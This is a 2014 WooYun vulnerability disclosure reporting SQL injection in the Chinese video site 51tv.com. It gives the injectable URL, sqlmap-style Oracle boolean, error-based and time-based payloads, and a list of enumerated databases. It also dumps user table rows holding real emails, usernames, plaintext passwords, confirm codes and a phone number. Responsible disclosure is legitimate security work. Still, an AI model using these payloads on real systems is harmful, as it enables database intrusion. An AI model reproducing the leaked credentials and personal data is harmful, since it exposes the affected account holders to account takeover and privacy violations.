当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083427

漏洞标题:优度宽频多处注入可拖库(泄露大量用户信息)

相关厂商:优度宽频

漏洞作者: JulyTornado

提交时间:2014-11-16 22:14

修复时间:2014-12-31 22:16

公开时间:2014-12-31 22:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上海优度宽带科技有限公司 客服热线:021-62650919

详细说明:

GET注入点:
http://www.51tv.com/51tv/dtl.jsp?id=757573754
问题信息:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=757573754 AND 5100=5100
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=757573754 AND 7101=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(114)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7101=7101) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(98)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=757573754 AND 1586=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(83)||CHR(77)||CHR(73),5)


列库:

available databases [24]:
[*] CDMA
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DRMCENTER
[*] EXFSYS
[*] GGATE
[*] MDSYS
[*] MEDIA_PREVIEW
[*] MEDIANEW
[*] MEDIATEST
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] RMAN
[*] STRMADMIN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] VCSUSER
[*] WMSYS
[*] XDB


当前库有700多个表,就不一一列举了,只能抽样证明危害。。。

sql注入.png


另一处post:

盲注1.png


盲注2.png


盲注3.png


盲注4.png

漏洞证明:

部分用户信息:

+-----------+-------------+-------+-------------------------------+--------------+--------------+----------+--------------+------------+----------------------------------+-------------+
| ID | TEL | ADMIN | EMAIL | USERNAME | PASSWORD | ISACTIVE | LINKERNAME | CREATETIME | CONFIRMCODE | PARTNERCODE |
+-----------+-------------+-------+-------------------------------+--------------+--------------+----------+--------------+------------+----------------------------------+-------------+
| | NULL | 1 | NULL | | viewtoo.51 | 1 | NULL | NULL | | admin |
| 125458253 | NULL | 0 | larfone@larfone.com | larfone | larfone | 0 | larfone | 27-7月 -11 | db6034bcddc842b7af12b787d0a7d576 | 100541 |
| 125448814 | NULL | | imolo@imolo.com | imolo | imolo | 0 | imolo | 27-7月 -11 | | |
| 126265896 | | | kuwotingting@kuwotingting.com | | kuwotingting | 0 | kuwotingting | 02-8月 -11 | | |
| | NULL | 0 | wali@wali.com | wali | wali | 0 | wali | | 6e2ffa07324346988d6f514d70b5ef74 | 100682 |
| 132041108 | NULL | 0 | 5151@5151.com | 5151 | 5151 | | | | 3ea89ca29c1746518718914989d485ce | 100722 |
| 132914363 | | 0 | | shoujitaonan | shoujitaonan | 0 | shoujitaonan | 30-8月 -11 | b4e3490fd28947bc8bec578fb00574a3 | |
| 133475494 | NULL | 0 | ecook@ecook.com | ecook | ecook | 0 | | | | 100781 |
| 136491905 | NULL | 0 | huozhong@huozhong.com | huozhong | huozhong | | huozhong | 14-9月 -11 | 6a4e0a5177de49e189f954b9be5548d7 | |
| 137613569 | NULL | 0 | koudai@koudai.com | koudai | | 0 | | 16-9月 -11 | e34ca636fb044f3ab68dd6519a68ae94 | 100841 |
| 138458812 | 15802130309 | 0 | mangxiang.he@51tv.com | mx | | 1 | | 20-9月 -11 | NULL | 100890 |
| | NULL | 0 | | xingzuodashi | xingzuodashi | 0 | xingzuodashi | 23-9月 -11 | fdf360b4c2f540e181413d35c93c04a7 | 100961 |
| 140761107 | NULL | 0 | ipadown@51tv.com | | | 0 | | | | 101021 |
| 154600599 | NULL | 0 | shujun.yu@51tv.com | meilishuo | meilishuo | 0 | 美丽说 | 15-11月-11 | 8e93ac24c9d740a0a58c1c6759152dab | 101362 |
| | NULL | 0 | aidongman@aidongman.com | aidongman | | 0 | aidongman | 22-11月-11 | 7168a7f990344b53b6223be494bfe96b | 101462 |
| 158921196 | NULL | 0 | app111@51tv.com | app111 | app111 | 0 | | | ac4fbab9fd0044bc98859a72a141c3e2 | 101561 |
| 158926615 | NULL | | shucheng@51tv.com | | shucheng | 0 | 书城 | 01-12月-11 | eaa4838b991a4d47b508dcc528b240e4 | |
| | NULL | 0 | youapp@51tv.com | | youapp | | 有app | | 5dca2c1c58634b81bffa2f7fdc1da44e | 101821 |
| 165541973 | NULL | 0 | laidiantong@laidiantong.com | | laidiantong | 0 | laidiantong | | | 101861 |
| 168850171 | NULL | 0 | zhujianqiang@51tv.com | zhujianqiang | zhujianqiang | 0 | zhujianqiang | 09-1月 -12 | df803431c06442398196d234e62ba944 | 101921 |


Database: MEDIANEW
Table: D_OPLUS_USER_BASE
[15 entries]
+--------+------------+------+---------+---------+----------+--------------+----------+------------------+------------+--------------+------------+------------+------------+-------------+--------------+---------------+---------------+----------------+
| ID | FAVORITEID | TAG | POINT | HEADPIC | USERNAME | USERCODE | NICKNAME | ACOUNTNUM | FORWARDNUM | PASSPORTNO | BINDSTATUS | SOCIALCODE | ACOUNTNAME | JELLYAMOUNT | LASTGAMETIME | LASTVISITTIME | LASTLOGINTIME | FIRSTLOGINTIME |
+--------+------------+------+---------+---------+----------+--------------+----------+------------------+------------+--------------+------------+------------+------------+-------------+--------------+---------------+---------------+----------------+
| 130648 | NULL | 1 | | NULL | no | nfrcsac | no | NULL | | nfrcsac | 0 | Oplus | | 195 | NULL | NULL | NULL | NULL |
| | | 0 | 3416116 | NULL | NULL | guomingzhang | 你大爷 | 592885920@qq.com | 373 | guomingzhang | 0 | Oplus | 张国明test | | 13-8月 -10 | NULL | NULL | |
| 130887 | | 0 | 940700 | NULL | NULL | | NULL | NULL | 100 | runooqiu | 0 | Oplus | NULL | 76300 | | NULL | | 16-3月 -10 |
| 131064 | NULL | | | NULL | | mason003 | | NULL | 0 | mason003 | | Oplus | NULL | 198 | NULL | NULL | NULL | NULL |
| 131090 | | 1 | 0 | | no | Sweetfairy | | | 0 | Sweetfairy | 0 | Oplus | NULL | 79 | NULL | NULL | NULL | |
| | | 0 | 2500565 | NULL | | anaxu | NULL | NULL | 1027 | | 0 | Oplus | | | 13-8月 -10 | NULL | | 16-3月 -10 |
| 132151 | NULL | 1 | | NULL | no | baleni51 | no | NULL | | baleni51 | 0 | | | 190 | NULL | NULL | NULL | NULL |
| 132178 | | 1 | 0 | NULL | no | | no | NULL | 0 | guwenbei | 0 | Oplus | | 160 | | NULL | NULL | NULL |
| 132339 | | 0 | | NULL | | kelly36806 | NULL | NULL | | kelly36806 | 0 | Oplus | NULL | 10 | 02-3月 -10 | NULL | NULL | NULL |
| 132352 | NULL | 1 | 0 | NULL | | youdu200 | | | 0 | youdu200 | | | NULL | 30 | NULL | NULL | NULL | NULL |
| 132631 | | 1 | 0 | NULL | no | | no | NULL | 0 | lululei1 | 0 | Oplus | NULL | 140 | NULL | NULL | NULL | NULL |
| 132717 | | 1 | 0 | NULL | no | shaxye | no | NULL | 0 | shaxye | 0 | | NULL | 180 | NULL | NULL | | NULL |
| | | 0 | | | NULL | jimmycctv | 众神之怒 | NULL | | jimmycctv | 0 | Oplus | NULL | 140 | | NULL | NULL | 29-4月 -10 |
| 136415 | NULL | | 0 | | no | lbc627281823 | | | 0 | lbc627281823 | 0 | Oplus | NULL | | NULL | NULL | NULL | NULL |
| 166268 | NULL | 1 | 0 | NULL | no | kk1980 | | | 0 | kk1980 | 0 | Oplus | NULL | 170 | | NULL | NULL | NULL |
+--------+------------+------+---------+---------+----------+--------------+----------+------------------+------------+--------------+------------+---

修复方案:

过滤url及post输入中的参数,密码不要使用明文保存

版权声明:转载请注明来源 JulyTornado@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-11-18 11:32 | follow me ( 路人 | Rank:4 漏洞数:2 | 可是大海还在那里。海里的鱼不会再爬上岸。...)

    这网站居然还活着

  2. 2015-01-01 02:32 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @follow me 那真是奇迹